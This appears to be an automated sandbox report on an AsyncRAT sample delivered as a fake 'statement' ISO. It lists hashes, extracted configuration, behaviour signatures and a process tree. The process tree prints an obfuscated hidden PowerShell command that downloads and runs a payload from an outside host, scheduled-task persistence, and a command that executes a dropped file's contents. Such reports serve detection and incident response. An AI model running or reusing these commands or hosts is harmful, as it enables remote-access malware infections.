Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/07/2024, 21:49

General

  • Target
    Statment#924869506.iso
  • Size
    1.4MB
  • MD5
    4b0aa2a63703f774aa8687300200a04d
  • SHA1
    af1118e88a4aad29bbc8760ed2f1b7a7a5017042
  • SHA256
    8dda70b17eda9096c62343eec5f60a3ed132f66a6f3d2e58c39afbad7280e9bc
  • SHA512
    ab280a85edbec30283be854fc1ebce7936561ffc00d0108411f65e4b6508c586875448db31c78686275c9aeae2aba5649ff6acafc73047608ebc269190e84bdc
  • SSDEEP
    384:6BP01dUB7P1dUB7OpnIUAkgko0oUQEwEo0i5UAEgEo0oUwkQko0IUAkgko0oUQEu:6d01dE7P1dE7OpCAtVAi

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Elsa3eed

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

  • pastebin_config

    https://pastebin.com/raw/C7vDhgZQ

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • Blocklisted process makes network request (5 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)

    Runs PowerShell with the display window hidden.

  • Checks computer location settings (2 TTPs, 4 IoCs)

    Looks up the country code configured in the registry, likely a geofence.

  • Enumerates connected drives (3 TTPs, 3 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Suspicious use of SetThreadContext (2 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (1 IoC)
  • Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses (11 IoCs)
  • Suspicious use of AdjustPrivilegeToken (49 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Suspicious use of WriteProcessMemory (35 IoCs)
  • Uses Task Scheduler COM API (1 TTP)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Statment#924869506.iso
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:4188
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID:2176
    • C:\Windows\System32\Notepad.exe
      "C:\Windows\System32\Notepad.exe" E:\Statment#014095818.wsf
      • Enumerates connected drives
      PID:4344
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"
      • Blocklisted process makes network request
      • Checks computer location settings
      • Enumerates connected drives
      • Suspicious use of WriteProcessMemory
      PID:4148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2132
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
          • Scheduled Task/Job: Scheduled Task
          PID:2260
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
          PID:3652
      • C:\Windows\System32\WScript.exe
        C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3436
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            PID:1836
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4820
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"
        • Checks computer location settings
        • Enumerates connected drives
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
            • Scheduled Task/Job: Scheduled Task
            PID:3540
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
            PID:1876
        • C:\Windows\System32\WScript.exe
          C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4792
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              PID:3504

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: f41839a3fe2888c8b3050197bc9a0a05
    SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
    SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
    SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5G8JI3LV\011011101110100000010101010001110010010101101110111010000001010[1]
    Filesize: 5KB
    MD5: b1a2ef3cb17547bd40e90d8d5df339f9
    SHA1: 5b47f0796d0526025e58843e76355237e9ae7bb9
    SHA256: ff47b96082b5aa66043090a8e902b85e04bd6355b0c2d031b6b26b64e5d3ce7f
    SHA512: 393bd4b01405d9c91478adfcb132f1ba194a4b166649d5bf5d0b385f48edfa6268869ec21ba3c8734566008688b386c63855a9b66a1fd810a7e8048a1524dcde
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 6fe7f2ff9f024b0658a4113e39b826fc
    SHA1: 07a0d4ec3b19b62fd409ddb60e843021ac40f1f3
    SHA256: e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1
    SHA512: 64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 3aeb291817e68548c1769a0a696b593e
    SHA1: a7c09a946b1c0ea9d8891b58c162b1e2920b0cec
    SHA256: dbe7bbb781971a705434da18b898aafd5d63247cda23fe34c4080f1a8760b74e
    SHA512: 7602ca1281ffde573be783369a975dfe6fef6a4fe00738f162cef29ce8115b8b5c1297855ae2707e1aabad158cd154cc3f893d3c66e4ef0cf4d5b48a1c36873c
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 856B
    MD5: ec4f2ab7f8d5f6be729ff9dfaa5c6a70
    SHA1: 760c281609a80d3b0a3d023aafb9d96da7b16e8e
    SHA256: 1eec5a02da8a948b0f3d762ca05eaca1efd32c7af3ea0536b6cf905e27aef3e7
    SHA512: 773feafee4ad24d1965c625219d730b19a7a0c3e8d650c5a1d102dfd1c6f5e9433c4f2583ead095812faf91ed87c45a3d4299f61474dc2fc762382a31e1b0562
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1pjxfaga.oxi.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml
    Filesize: 1KB
    MD5: 26913303151afee791eb652db6764fe2
    SHA1: 49418253140caeacb2a1b5bfac48f4bc8e8d5b24
    SHA256: 14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248
    SHA512: 5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141
  • C:\Users\Public\Music\TvMusic.music
    Filesize: 452KB
    MD5: 6c396a8cfe36cbdc7eb72c2f6c8b2346
    SHA1: 6078599b7406607c848e56e162ea79a691a2aff4
    SHA256: 9f60cdba09c697e1277f56435afaa9a7922e62a53d87f44d2cf1eeef2eacbaf8
    SHA512: 7a79bf3d19e5949df8ecba34339b922c73c3464747b8348e4908859f76c756e8a3c710873b84253ebedc846e83203f0ca72c46b9e6a06cb1a5dfd6ae32aced0b
  • C:\Users\Public\Music\TvMusic.vbs
    Filesize: 229B
    MD5: 66a1516e1d1e821084441211567d2e87
    SHA1: 0e688c9a93ad2cc162ef48ca75e0148e69d95ab1
    SHA256: d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717
    SHA512: 1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12
  • memory/2132-66-0x00000176203A0000-0x0000017620562000-memory.dmp
    Filesize: 1.8MB
  • memory/2132-4-0x000001761DBE0000-0x000001761DC02000-memory.dmp
    Filesize: 136KB
  • memory/2132-67-0x0000017620AA0000-0x0000017620FC8000-memory.dmp
    Filesize: 5.2MB
  • memory/3436-28-0x0000022BC7230000-0x0000022BC723C000-memory.dmp
    Filesize: 48KB
  • memory/4820-47-0x0000000005D70000-0x0000000005E02000-memory.dmp
    Filesize: 584KB
  • memory/4820-48-0x00000000069F0000-0x00000000069FA000-memory.dmp
    Filesize: 40KB
  • memory/4820-46-0x0000000006020000-0x00000000065C4000-memory.dmp
    Filesize: 5.6MB
  • memory/4820-45-0x00000000057D0000-0x000000000586C000-memory.dmp
    Filesize: 624KB
  • memory/4820-44-0x0000000005340000-0x00000000053A6000-memory.dmp
    Filesize: 408KB
  • memory/4820-70-0x0000000007520000-0x0000000007596000-memory.dmp
    Filesize: 472KB
  • memory/4820-71-0x00000000075A0000-0x000000000765C000-memory.dmp
    Filesize: 752KB
  • memory/4820-72-0x00000000076A0000-0x00000000076BE000-memory.dmp
    Filesize: 120KB
  • memory/4820-74-0x00000000076C0000-0x00000000076CA000-memory.dmp
    Filesize: 40KB
  • memory/4820-29-0x0000000000400000-0x0000000000416000-memory.dmp
    Filesize: 88KB